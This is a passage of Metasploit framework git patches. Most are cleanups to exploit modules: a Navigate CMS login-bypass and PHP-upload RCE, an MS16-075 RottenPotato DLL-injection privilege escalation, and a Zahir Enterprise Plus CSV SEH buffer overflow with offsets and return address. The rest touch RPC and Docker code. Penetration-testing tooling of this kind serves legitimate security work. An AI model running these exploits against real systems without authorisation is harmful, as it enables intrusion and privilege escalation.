"multi/gather/wlan_geolocate", From 97729727d88d4b391361f2ff37e501884dd92f18 Mon Sep 17 00:00:00 2001 From: Jacob Robles Date: Tue, 2 Oct 2018 06:57:04 -0500 Subject: [PATCH 139/192] Minor modifications --- .../exploit/multi/http/navigate_cms_rce.md | 1 + .../exploits/multi/http/navigate_cms_rce.rb | 41 ++++++++----------- 2 files changed, 17 insertions(+), 25 deletions(-) diff --git a/documentation/modules/exploit/multi/http/navigate_cms_rce.md b/documentation/modules/exploit/multi/http/navigate_cms_rce.md index 66248b197c..0bfd6748fc 100644 --- a/documentation/modules/exploit/multi/http/navigate_cms_rce.md +++ b/documentation/modules/exploit/multi/http/navigate_cms_rce.md @@ -3,6 +3,7 @@ This module exploits insufficient sanitization in the database::protect method, of Navigate CMS versions 2.8 and prior, to bypass authentication. It then uses a path traversal vulnerability in navigate_upload.php that allows authenticated users to upload PHP files to arbitrary locations. Together these vulnerabilities allow an unauthenticated attacker to execute arbitrary PHP code remotely. + This module was tested against Navigate CMS 2.8. ## Vulnerable Application diff --git a/modules/exploits/multi/http/navigate_cms_rce.rb b/modules/exploits/multi/http/navigate_cms_rce.rb index 31accdefb6..17a3199043 100644 --- a/modules/exploits/multi/http/navigate_cms_rce.rb +++ b/modules/exploits/multi/http/navigate_cms_rce.rb @@ -12,15 +12,15 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Navigate CMS Unauthenticated Remote Code Execution', 'Description' => %q( - This module exploits insufficient sanitization in the database::protect - method, of Navigate CMS versions 2.8 and prior, to bypass authentication. + This module exploits insufficient sanitization in the database::protect + method, of Navigate CMS versions 2.8 and prior, to bypass authentication. - It then uses a path traversal vulnerability in navigate_upload.php that - allows authenticated users to upload PHP files to arbitrary locations. - Together these vulnerabilities allow an unauthenticated attacker to - execute arbitrary PHP code remotely. + The module then uses a path traversal vulnerability in navigate_upload.php + that allows authenticated users to upload PHP files to arbitrary locations. + Together these vulnerabilities allow an unauthenticated attacker to + execute arbitrary PHP code remotely. - This module was tested against Navigate CMS 2.8. + This module was tested against Navigate CMS 2.8. ), 'Author' => [ @@ -35,7 +35,6 @@ class MetasploitModule < Msf::Exploit::Remote 'Privileged' => false, 'Platform' => ['php'], 'Arch' => ARCH_PHP, - 'Payload' => {}, 'Targets' => [ ['Automatic', {}] @@ -43,11 +42,9 @@ class MetasploitModule < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'Sep 26 2018')) - register_options( - [ - OptString.new('TARGETURI', [true, 'Base Navigate CMS directory path', '/navigate/']) - ] - ) + register_options [ + OptString.new('TARGETURI', [true, 'Base Navigate CMS directory path', '/navigate/']), + ] end def login_bypass @@ -66,30 +63,24 @@ class MetasploitModule < Msf::Exploit::Remote login_bypass_resp.code == 302 && check_resp.body.include?('Navigate CMS') session_id = login_bypass_resp.get_cookies_parsed - .values.select { |v| v.to_s =~ /NVSID_/ } + .values.select { |v| v.to_s.include?('NVSID_') } .first.first return session_id end end def check - if login_bypass - return CheckCode::Vulnerable - end - - return CheckCode::Safe + return CheckCode::Vulnerable if login_bypass + CheckCode::Safe end def exploit session_id = login_bypass + fail_with(Failure::NoAccess, 'Login bypass failed') unless session_id - if session_id - print_good('Login bypass successful') - else - fail_with(Failure::NoAccess, 'Login bypass failed') - end + print_good('Login bypass successful') - php = %() + php = payload.encoded data = Rex::MIME::Message.new data.add_part(php, 'image/jpeg', nil, "form-data; name=\"file\"; filename=\"#{rand_text_alphanumeric(10..15)}\"") From 4927f96f618f81c31669ab02f8ae9ae1905811e6 Mon Sep 17 00:00:00 2001 From: Fabio Poloni Date: Tue, 2 Oct 2018 15:57:57 +0200 Subject: [PATCH 140/192] Fixed small typo --- modules/exploits/windows/browser/ms11_003_ie_css_import.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb index 35b6b44347..5b1a7b3ddd 100644 --- a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb +++ b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb @@ -96,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote } ], - # For now, treat the IE6 target the same as teh debug target. + # For now, treat the IE6 target the same as the debug target. [ 'Internet Explorer 6', { 'Ret' => 0xc0c0c0c0, From c5d2269c5aca23fc4449e4cbea50b786de3ef0ce Mon Sep 17 00:00:00 2001 From: Metasploit Date: Tue, 2 Oct 2018 07:11:01 -0700 Subject: [PATCH 141/192] automatic module_metadata_base.json update --- db/modules_metadata_base.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/db/modules_metadata_base.json b/db/modules_metadata_base.json index 818fc5047e..9d049f54ac 100644 --- a/db/modules_metadata_base.json +++ b/db/modules_metadata_base.json @@ -88168,7 +88168,7 @@ "Internet Explorer 6", "Debug Target (Crash)" ], - "mod_time": "2018-09-15 18:54:45 +0000", + "mod_time": "2018-10-02 15:57:57 +0000", "path": "/modules/exploits/windows/browser/ms11_003_ie_css_import.rb", "is_install_path": true, "ref_name": "windows/browser/ms11_003_ie_css_import", From d807600ebe63c2f9fa934bff736ee833cdb49706 Mon Sep 17 00:00:00 2001 From: Matthew Kienow Date: Tue, 2 Oct 2018 13:38:07 -0400 Subject: [PATCH 142/192] Enhance RPC information retrieval Add the ability to retrieve additional module information for payloads, encoders and nops. Add ability to filter these modules by architectures. --- lib/msf/core/rpc/v10/rpc_module.rb | 174 ++++++++++++++++++++++++++--- 1 file changed, 156 insertions(+), 18 deletions(-) diff --git a/lib/msf/core/rpc/v10/rpc_module.rb b/lib/msf/core/rpc/v10/rpc_module.rb index 418f7bd507..2cbb78cc33 100644 --- a/lib/msf/core/rpc/v10/rpc_module.rb +++ b/lib/msf/core/rpc/v10/rpc_module.rb @@ -1,5 +1,6 @@ # -*- coding: binary -*- +require 'json' require 'msf/util/document_generator' module Msf @@ -28,38 +29,128 @@ class RPC_Module < RPC_Base end - # Returns a list of payload module names. The 'payload/' prefix will not be included. + # Returns a list of payload module names or a hash with payload module names as keys to hashes + # that contain the module information fields requested. The 'payload/' prefix will not be included. # - # @return [Hash] A list of payload module names. It contains the following key: - # * 'modules' [Array] Payload module names, for example: ['windows/x64/shell_reverse_tcp'] + # @param module_info [String] Comma-separated list of module information field names. + # If this is nil, then only module names are returned. Default: nil + # @param arch [String] Comma-separated list of one or more architectures that + # the module must support. The module need only support one of the architectures + # to be included, not all architectures. Default: nil + # + # @return [Hash] If module_info is nil, a list of payload module names. It contains the following key: + # * 'modules' [Array] Payload module names, for example: ['windows/x64/shell_reverse_tcp'] + # If module_info is not nil, payload module names as keys to hashes that contain the requested module + # information fields. It contains the following key: + # * 'modules' [Hash] for example: + # {"windows/x64/shell_reverse_tcp"=>{"name"=>"Windows x64 Command Shell, Reverse TCP Inline"} # @example Here's how you would use this from the client: # rpc.call('module.payloads') - def rpc_payloads - { "modules" => self.framework.payloads.keys } + def rpc_payloads(module_info = nil, arch = nil) + unless module_info.nil? + module_info = module_info.strip.split(',').map(&:strip) + module_info.map!(&:to_sym) + end + + unless arch.nil? + arch = arch.strip.split(',').map(&:strip) + end + + data = module_info.nil? ? [] : {} + arch_filter = !arch.nil? && !arch.empty? ? arch : nil + self.framework.payloads.each_module('Arch' => arch_filter) do |name, mod| + if module_info.nil? + data << name + else + tmp_mod_info = ::JSON.parse(Msf::Serializer::Json.dump_module(mod.new), symbolize_names: true) + data[name] = tmp_mod_info.select { |k,v| module_info.include?(k) } + end + end + + { "modules" => data } end - - # Returns a list of encoder module names. The 'encoder/' prefix will not be included. + # Returns a list of encoder module names or a hash with encoder module names as keys to hashes + # that contain the module information fields requested. The 'encoder/' prefix will not be included. # - # @return [Hash] A list of encoder module names. It contains the following key: - # * 'modules' [Array] Encoder module names, for example: ['x86/unicode_upper'] + # @param module_info [String] Comma-separated list of module information field names. + # If this is nil, then only module names are returned. Default: nil + # @param arch [String] Comma-separated list of one or more architectures that + # the module must support. The module need only support one of the architectures + # to be included, not all architectures. Default: nil + # + # @return [Hash] If module_info is nil, a list of encoder module names. It contains the following key: + # * 'modules' [Array] Encoder module names, for example: ['x86/unicode_upper'] + # If module_info is not nil, encoder module names as keys to hashes that contain the requested module + # information fields. It contains the following key: + # * 'modules' [Hash] for example: + # {"x86/unicode_upper"=>{"name"=>"Alpha2 Alphanumeric Unicode Uppercase Encoder", "rank"=>"Manual"}} # @example Here's how you would use this from the client: # rpc.call('module.encoders') - def rpc_encoders - { "modules" => self.framework.encoders.keys } + def rpc_encoders(module_info = nil, arch = nil) + unless module_info.nil? + module_info = module_info.strip.split(',').map(&:strip) + module_info.map!(&:to_sym) + end + + unless arch.nil? + arch = arch.strip.split(',').map(&:strip) + end + + data = module_info.nil? ? [] : {} + arch_filter = !arch.nil? && !arch.empty? ? arch : nil + self.framework.encoders.each_module('Arch' => arch_filter) do |name, mod| + if module_info.nil? + data << name + else + tmp_mod_info = ::JSON.parse(Msf::Serializer::Json.dump_module(mod.new), symbolize_names: true) + data[name] = tmp_mod_info.select { |k,v| module_info.include?(k) } + end + end + + { "modules" => data } end - - # Returns a list of NOP module names. The 'nop/' prefix will not be included. + # Returns a list of NOP module names or a hash with NOP module names as keys to hashes + # that contain the module information fields requested. The 'nop/' prefix will not be included. # - # @return [Hash] A list of NOP module names. It contains the following key: - # * 'modules' [Array] NOP module names, for example: ['x86/single_byte'] + # @param module_info [String] Comma-separated list of module information field names. + # If this is nil, then only module names are returned. Default: nil + # @param arch [String] Comma-separated list of one or more architectures that + # the module must support. The module need only support one of the architectures + # to be included, not all architectures. Default: nil + # + # @return [Hash] If module_info is nil, a list of NOP module names. It contains the following key: + # * 'modules' [Array] NOP module names, for example: ['x86/single_byte'] + # If module_info is not nil, NOP module names as keys to hashes that contain the requested module + # information fields. It contains the following key: + # * 'modules' [Hash] for example: + # {"x86/single_byte"=>{"name"=>"Single Byte", "rank"=>"Normal"}} # @example Here's how you would use this from the client: # rpc.call('module.nops') - def rpc_nops - { "modules" => self.framework.nops.keys } - end + def rpc_nops(module_info = nil, arch = nil) + unless module_info.nil? + module_info = module_info.strip.split(',').map(&:strip) + module_info.map!(&:to_sym) + end + unless arch.nil? + arch = arch.strip.split(',').map(&:strip) + end + + data = module_info.nil? ? [] : {} + arch_filter = !arch.nil? && !arch.empty? ? arch : nil + self.framework.nops.each_module('Arch' => arch_filter) do |name, mod| + if module_info.nil? + data << name + else + tmp_mod_info = ::JSON.parse(Msf::Serializer::Json.dump_module(mod.new), symbolize_names: true) + data[name] = tmp_mod_info.select { |k,v| module_info.include?(k) } + end + end + + { "modules" => data } + end # Returns a list of post module names. The 'post/' prefix will not be included. # @@ -315,6 +406,53 @@ class RPC_Module < RPC_Base end + # Returns a list of executable format names. + # + # @return [Array] A list of executable format names, for example: ["exe"] + # @example Here's how you would use this from the client: + # rpc.call('module.executable_formats') + def rpc_executable_formats + ::Msf::Util::EXE.to_executable_fmt_formats + end + + # Returns a list of transform format names. + # + # @return [Array] A list of transform format names, for example: ["powershell"] + # @example Here's how you would use this from the client: + # rpc.call('module.transform_formats') + def rpc_transform_formats + ::Msf::Simple::Buffer.transform_formats + end + + # Returns a list of encryption format names. + # + # @return [Array] A list of encryption format names, for example: ["aes256"] + # @example Here's how you would use this from the client: + # rpc.call('module.encryption_formats') + def rpc_encryption_formats + ::Msf::Simple::Buffer.encryption_formats + end + + # Returns a list of platform names. + # + # @return [Array] A list of platform names, for example: ["linux"] + # @example Here's how you would use this from the client: + # rpc.call('module.platforms') + def rpc_platforms + supported_platforms = [] + Msf::Module::Platform.subclasses.each { |c| supported_platforms << c.realname.downcase } + supported_platforms.sort + end + + # Returns a list of architecture names. + # + # @return [Array] A list of architecture names, for example: ["x64"] + # @example Here's how you would use this from the client: + # rpc.call('module.architectures') + def rpc_architectures + supported_archs = ARCH_ALL.dup + supported_archs.sort + end # Returns a list of encoding formats. # From ccad78d567071a5ebc2849c55da194c9b645b845 Mon Sep 17 00:00:00 2001 From: Matthew Kienow Date: Tue, 2 Oct 2018 14:11:02 -0400 Subject: [PATCH 143/192] Fix spelling mistake --- lib/msf/core/rpc/v10/rpc_module.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/rpc/v10/rpc_module.rb b/lib/msf/core/rpc/v10/rpc_module.rb index 2cbb78cc33..4b837bef2b 100644 --- a/lib/msf/core/rpc/v10/rpc_module.rb +++ b/lib/msf/core/rpc/v10/rpc_module.rb @@ -456,7 +456,7 @@ class RPC_Module < RPC_Base # Returns a list of encoding formats. # - # @return [Array] Encoding foramts. + # @return [Array] Encoding formats. # @example Here's how you would use this from the client: # rpc.call('module.encode_formats') def rpc_encode_formats From 64d53cd882ef3fce14927bb431cfd0945cd46bb6 Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Tue, 2 Oct 2018 14:06:25 -0500 Subject: [PATCH 144/192] code cleanup --- .../windows/local/ms16_075_reflection.rb | 73 ++++++++++--------- 1 file changed, 40 insertions(+), 33 deletions(-) diff --git a/modules/exploits/windows/local/ms16_075_reflection.rb b/modules/exploits/windows/local/ms16_075_reflection.rb index f49a0511e0..986de4288f 100644 --- a/modules/exploits/windows/local/ms16_075_reflection.rb +++ b/modules/exploits/windows/local/ms16_075_reflection.rb @@ -40,6 +40,7 @@ class MetasploitModule < Msf::Exploit::Local }, 'Targets' => [ + [ 'Automatic', {} ], [ 'Windows x86', { 'Arch' => ARCH_X86 } ], [ 'Windows x64', { 'Arch' => ARCH_X64 } ] ], @@ -60,44 +61,62 @@ class MetasploitModule < Msf::Exploit::Local })) end - def check_arch - os = sysinfo["OS"] - - if sysinfo["Architecture"] =~ /(wow|x)64/i - if session.railgun.kernel32.IsWow64Process(-1, 4)["Wow64Process"] == "\x00\x00\x00\x00" - arch = ARCH_X64 - else - arch = ARCH_X86 + def assign_target() + if target.name == 'Automatic' + case sysinfo["Architecture"] + when 'x86' + vprint_status("Found we are on an x86 target") + my_target = targets[1] + when 'x64' + vprint_status("Found we are on an x64 target") + my_target = targets[2] + else + fail_with(Failure::NoTarget, "Unable to determine target") end - elsif sysinfo["Architecture"] == ARCH_X86 - arch = ARCH_X86 + else + my_target = target end - - return arch + return my_target end + def verify_arch(my_target) + if my_target["Arch"] != sysinfo["Architecture"] + print_error("Assigned Target Arch = #{my_target.opts["Arch"]}") + print_error("Actual Target Arch = #{sysinfo["Architecture"]}") + fail_with(Failure::BadConfig, "Assigned Arch does not match reality") + end + if client.arch != sysinfo["Architecture"] + fail_with(Failure::BadConfig, "Session/Target Arch mismatch; WOW64 not supported") + else + vprint_good("Current payload and target Arch match....") + end + end + def check privs = client.sys.config.getprivs if privs.include?('SeImpersonatePrivilege') return Exploit::CheckCode::Detected end - return Exploit::CheckCode::Safe end def exploit - if check == Exploit::CheckCode::Safe - fail_with(Failure::None, 'User does not have the SeImpersonate Privilege') - end - if is_system? fail_with(Failure::None, 'Session is already elevated') end - - if sysinfo["Architecture"] =~ /wow64/i - fail_with(Failure::NoTarget, 'Running against WOW64 is not supported') + my_target = assign_target() + print_status("#{my_target["arch"]}") + verify_arch(my_target) + check() + if my_target.opts["Arch"] == 'x64' + dll_file_name = 'rottenpotato.x64.dll' + vprint_status("Assigning payload rottenpotato.x64.dll") + elsif my_target.opts["Arch"] == 'x86' + dll_file_name = 'rottenpotato.x86.dll' + vprint_status("Assigning payload rottenpotato.x86.dll") + else + fail_with(Failure::BadConfig, "Unknown target arch; unable to assign exploit code") end - print_status('Launching notepad to host the exploit...') notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true}) begin @@ -107,29 +126,17 @@ class MetasploitModule < Msf::Exploit::Local print_error('Operation failed. Trying to elevate the current process...') process = client.sys.process.open end - print_status("Reflectively injecting the exploit DLL into #{process.pid}...") - architecture = check_arch - if architecture == ARCH_X64 - dll_file_name = 'rottenpotato.x64.dll' - else - dll_file_name = 'rottenpotato.x86.dll' - end - library_path = ::File.join(Msf::Config.data_directory, "exploits", "rottenpotato", dll_file_name) library_path = ::File.expand_path(library_path) - print_status("Injecting exploit into #{process.pid}...") exploit_mem, offset = inject_dll_into_process(process, library_path) - print_status("Exploit injected. Injecting payload into #{process.pid}...") payload_mem = inject_into_process(process, payload.encoded) - # invoke the exploit, passing in the address of the payload that # we want invoked on successful exploitation. print_status('Payload injected. Executing exploit...') process.thread.create(exploit_mem + offset, payload_mem) - print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') end end From 428d36844440d37956b81202dcb05e07b4547051 Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Tue, 2 Oct 2018 14:40:55 -0500 Subject: [PATCH 145/192] shut up, rubocop --- .../windows/local/ms16_075_reflection.rb | 54 +++++++++---------- 1 file changed, 27 insertions(+), 27 deletions(-) diff --git a/modules/exploits/windows/local/ms16_075_reflection.rb b/modules/exploits/windows/local/ms16_075_reflection.rb index 986de4288f..c05d328767 100644 --- a/modules/exploits/windows/local/ms16_075_reflection.rb +++ b/modules/exploits/windows/local/ms16_075_reflection.rb @@ -17,12 +17,12 @@ class MetasploitModule < Msf::Exploit::Local def initialize(info={}) super(update_info(info, { 'Name' => 'Windows Net-NTLMv2 Reflection DCOM/RPC', - 'Description' => %q{ + 'Description' => %q( Module utilizes the Net-NTLMv2 reflection between DCOM/RPC to achieve a SYSTEM handle for elevation of privilege. Currently the module does not spawn as SYSTEM, however once achieving a shell, one can easily use incognito to impersonate the token. - }, + ), 'License' => MSF_LICENSE, 'Author' => [ @@ -30,19 +30,19 @@ class MetasploitModule < Msf::Exploit::Local 'breenmachine', # Rotten Potato NG! 'Mumbai' # Austin : port of RottenPotato for reflection & quick module ], - 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'Arch' => [ARCH_X86, ARCH_X64], 'Platform' => 'win', - 'SessionTypes' => [ 'meterpreter' ], + 'SessionTypes' => ['meterpreter'], 'DefaultOptions' => { 'EXITFUNC' => 'none', - 'WfsDelay' => '20', + 'WfsDelay' => '20' }, 'Targets' => [ - [ 'Automatic', {} ], - [ 'Windows x86', { 'Arch' => ARCH_X86 } ], - [ 'Windows x64', { 'Arch' => ARCH_X64 } ] + ['Automatic', {}], + ['Windows x86', { 'Arch' => ARCH_X86 }], + ['Windows x64', { 'Arch' => ARCH_X64 }] ], 'Payload' => { @@ -61,17 +61,17 @@ class MetasploitModule < Msf::Exploit::Local })) end - def assign_target() + def assign_target if target.name == 'Automatic' case sysinfo["Architecture"] - when 'x86' - vprint_status("Found we are on an x86 target") - my_target = targets[1] - when 'x64' - vprint_status("Found we are on an x64 target") - my_target = targets[2] - else - fail_with(Failure::NoTarget, "Unable to determine target") + when 'x86' + vprint_status("Found we are on an x86 target") + my_target = targets[1] + when 'x64' + vprint_status("Found we are on an x64 target") + my_target = targets[2] + else + fail_with(Failure::NoTarget, "Unable to determine target") end else my_target = target @@ -81,8 +81,8 @@ class MetasploitModule < Msf::Exploit::Local def verify_arch(my_target) if my_target["Arch"] != sysinfo["Architecture"] - print_error("Assigned Target Arch = #{my_target.opts["Arch"]}") - print_error("Actual Target Arch = #{sysinfo["Architecture"]}") + print_error("Assigned Target Arch = #{my_target.opts['Arch']}") + print_error("Actual Target Arch = #{sysinfo['Architecture']}") fail_with(Failure::BadConfig, "Assigned Arch does not match reality") end if client.arch != sysinfo["Architecture"] @@ -91,11 +91,11 @@ class MetasploitModule < Msf::Exploit::Local vprint_good("Current payload and target Arch match....") end end - + def check privs = client.sys.config.getprivs if privs.include?('SeImpersonatePrivilege') - return Exploit::CheckCode::Detected + return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end @@ -104,21 +104,21 @@ class MetasploitModule < Msf::Exploit::Local if is_system? fail_with(Failure::None, 'Session is already elevated') end - my_target = assign_target() - print_status("#{my_target["arch"]}") + my_target = assign_target + print_status("#{my_target['Arch']}") verify_arch(my_target) - check() - if my_target.opts["Arch"] == 'x64' + check + if my_target.opts['Arch'] == 'x64' dll_file_name = 'rottenpotato.x64.dll' vprint_status("Assigning payload rottenpotato.x64.dll") - elsif my_target.opts["Arch"] == 'x86' + elsif my_target.opts['Arch'] == 'x86' dll_file_name = 'rottenpotato.x86.dll' vprint_status("Assigning payload rottenpotato.x86.dll") else fail_with(Failure::BadConfig, "Unknown target arch; unable to assign exploit code") end print_status('Launching notepad to host the exploit...') - notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true}) + notepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true) begin process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) print_good("Process #{process.pid} launched.") From 19a5c89b9d7c9c217622abcf6439f6df9612ce51 Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Tue, 2 Oct 2018 17:00:43 -0500 Subject: [PATCH 146/192] Update VS toolset to match VS 2013 --- .../rottenpotato/MSFRottenPotato/MSFRottenPotato.vcxproj | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) mode change 100644 => 100755 external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.vcxproj diff --git a/external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.vcxproj b/external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.vcxproj old mode 100644 new mode 100755 index 3b69b6ed68..96f341c9bd --- a/external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.vcxproj +++ b/external/source/exploits/rottenpotato/MSFRottenPotato/MSFRottenPotato.vcxproj @@ -47,7 +47,7 @@ DynamicLibrary false - v141 + v120 true Unicode From e0a664c0cd0a9c1d20ec3e60aeee9579ccee3226 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 2 Oct 2018 21:33:01 -0500 Subject: [PATCH 147/192] Improve prints, use FileDropper, and bump TIMEOUT --- modules/post/multi/manage/upload_exec.rb | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/modules/post/multi/manage/upload_exec.rb b/modules/post/multi/manage/upload_exec.rb index e930fa690e..277a305de9 100644 --- a/modules/post/multi/manage/upload_exec.rb +++ b/modules/post/multi/manage/upload_exec.rb @@ -5,6 +5,7 @@ class MetasploitModule < Msf::Post include Msf::Post::File + include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, @@ -20,12 +21,14 @@ class MetasploitModule < Msf::Post OptPath.new('LPATH', [true, 'Local file path to upload and execute']), OptString.new('RPATH', [false, 'Remote file path on target (default is basename of LPATH)']), OptString.new('ARGS', [false, 'Command-line arguments to pass to the uploaded file']), - OptInt.new('TIMEOUT', [true, 'Timeout for command execution', 15]) + OptInt.new('TIMEOUT', [true, 'Timeout for command execution', 60]) ]) end def run + print_status("Uploading #{lpath} to #{rpath}") upload_file(rpath, lpath) + register_file_for_cleanup(rpath) if session.platform == 'windows' # Don't use cmd.exe /c start so we can fetch output @@ -38,15 +41,14 @@ class MetasploitModule < Msf::Post cmd = rpath.start_with?('/') ? rpath : "./#{rpath}" end + print_status("Executing command: #{cmd}") output = cmd_exec(cmd, args, timeout) if output.blank? - vprint_status('Command returned no output') + print_status('Command returned no output') else print_line(output) end - - rm_f(rpath) end def lpath From cb5d68b641873fce966dc8e18a751a6df59ac17b Mon Sep 17 00:00:00 2001 From: Thomas Gregory Date: Wed, 3 Oct 2018 17:13:24 +0700 Subject: [PATCH 148/192] Fixing based on msftidy.rb Makes msftidy happy --- .../windows/fileformat/zahir_enterprise_plus_csv.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb b/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb index 3f95007619..4c9590d60b 100644 --- a/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb +++ b/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb @@ -14,19 +14,19 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => "Zahir Enterprise Plus 6 Stack Buffer Overflow Exploit", 'Description' => %q{ This module exploits a stack buffer overflow in Zahir Enterprise Plus version 6 build 10b and below. - The vulnerability is triggered when opening a CSV file containing CR/LF and overly long string characters + The vulnerability is triggered when opening a CSV file containing CR/LF and overly long string characters via Import from other File. This results in overwriting a structured exception handler record. }, 'License' => MSF_LICENSE, 'Author' => [ - 'f3ci', # found the vulnerability + 'f3ci', # found the vulnerability 'modpr0be' # Metasploit Module ], 'References' => [ [ 'CVE', '2018-17408' ], - [ 'EDB', '38035' ] + [ 'EDB', '45505' ] ], 'Platform' => 'win', 'Targets' => @@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote 'BadChars' => "\x00\x0a\x0d\x22\x2c" }, 'Privileged' => false, - 'DisclosureDate' => "Sept 28 2018", + 'DisclosureDate' => 'Sep 28 2018', 'DefaultTarget' => 0)) register_options( From 991ac3c6715032ff0abd090b7ef225bbbd268ff5 Mon Sep 17 00:00:00 2001 From: Thomas Gregory Date: Wed, 3 Oct 2018 18:55:29 +0700 Subject: [PATCH 149/192] Fixing for msftidy Fixing some format because still throw errors --- .../windows/fileformat/zahir_enterprise_plus_csv.rb | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb b/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb index 4c9590d60b..65a722a1e5 100644 --- a/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb +++ b/modules/exploits/windows/fileformat/zahir_enterprise_plus_csv.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'f3ci', # found the vulnerability + 'f3ci', # found the vulnerability 'modpr0be' # Metasploit Module ], 'References' => @@ -34,7 +34,8 @@ class MetasploitModule < Msf::Exploit::Remote [ 'Zahir Enterprise Plus 6 <=build 10b (7/8/10) Windows Universal', { - 'Ret' => 0x52016661, # P/P/R from vclie100.bpl (C:\Program Files\Zahir Personal 6 - Demo Version\vclie100.bpl) + #P/P/R from vclie100.bpl (C:\Program Files\Zahir Personal 6 - Demo Version\vclie100.bpl) + 'Ret' => 0x52016661, 'Offset' => 3041 } ] @@ -42,7 +43,9 @@ class MetasploitModule < Msf::Exploit::Remote 'Payload' => { 'Space' => 5000, - 'BadChars' => "\x00\x0a\x0d\x22\x2c" + 'BadChars' => "\x00\x0a\x0d\x22\x2c", + 'DisableNops' => true, + 'StackAdjustment' => -3500 }, 'Privileged' => false, 'DisclosureDate' => 'Sep 28 2018', @@ -57,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote def exploit buf = rand_text_alpha_upper(target['Offset']) - buf << "\n\r" # crash chars + buf << "\r\n" # crash chars buf << rand_text_alpha_upper(380) # extra chars to hit the offset buf << generate_seh_record(target.ret) buf << make_nops(12) From 18d6cc0ee0ebdbd57401b80372545b1825d3fa67 Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Wed, 3 Oct 2018 15:19:08 -0500 Subject: [PATCH 150/192] Add support for info command --- lib/msf/base/serializer/readable_text.rb | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) diff --git a/lib/msf/base/serializer/readable_text.rb b/lib/msf/base/serializer/readable_text.rb index 80b7a746dc..4d262624c3 100644 --- a/lib/msf/base/serializer/readable_text.rb +++ b/lib/msf/base/serializer/readable_text.rb @@ -179,6 +179,30 @@ class ReadableText } output << "\n" + unless mod.side_effects.empty? + output << "Module side effects:\n" + mod.side_effects.each { |side_effect| + output << indent + side_effect + "\n" + } + output << "\n" + end + + unless mod.stability.empty? + output << "Module stability:\n" + mod.stability.each { |stability| + output << indent + stability + "\n" + } + output << "\n" + end + + unless mod.reliability.empty? + output << "Module reliability:\n" + mod.reliability.each { |reliability| + output << indent + reliability + "\n" + } + output << "\n" + end + # Targets output << "Available targets:\n" output << dump_exploit_targets(mod, indent) From d69ae54835c091f3fb80101478f10f4b144ce0f1 Mon Sep 17 00:00:00 2001 From: Matthew Kienow Date: Wed, 3 Oct 2018 16:40:37 -0400 Subject: [PATCH 151/192] Remove unneeded UserServlet --- lib/msf/core/web_services/json_rpc_app.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/lib/msf/core/web_services/json_rpc_app.rb b/lib/msf/core/web_services/json_rpc_app.rb index 2501b4a05b..4f470dea29 100644 --- a/lib/msf/core/web_services/json_rpc_app.rb +++ b/lib/msf/core/web_services/json_rpc_app.rb @@ -6,7 +6,6 @@ require 'msf/core/rpc' require 'msf/core/db_manager/http/authentication' require 'msf/core/db_manager/http/servlet_helper' require 'msf/core/db_manager/http/servlet/auth_servlet' -require 'msf/core/db_manager/http/servlet/user_servlet' require 'msf/core/web_services/servlet/json_rpc_servlet' class JsonRpcApp < Sinatra::Base @@ -15,7 +14,6 @@ class JsonRpcApp < Sinatra::Base # Servlet registration register AuthServlet - register UserServlet register JsonRpcServlet set :framework, Msf::Simple::Framework.create({}) From 59c5e527a0924dac9b4318661b46af95bcc87e69 Mon Sep 17 00:00:00 2001 From: Mostafa Hussein Date: Thu, 4 Oct 2018 01:54:35 +0200 Subject: [PATCH 152/192] Dockerfile: Use Multi-Stage Build --- Dockerfile | 39 ++++++++++++++++++--------------------- 1 file changed, 18 insertions(+), 21 deletions(-) diff --git a/Dockerfile b/Dockerfile index ddf88768b4..b2b3d7799e 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,9 +1,8 @@ -FROM ruby:2.5.1-alpine3.7 +FROM ruby:2.5.1-alpine3.7 AS builder LABEL maintainer="Rapid7" ARG BUNDLER_ARGS="--jobs=8 --without development test coverage" ENV APP_HOME 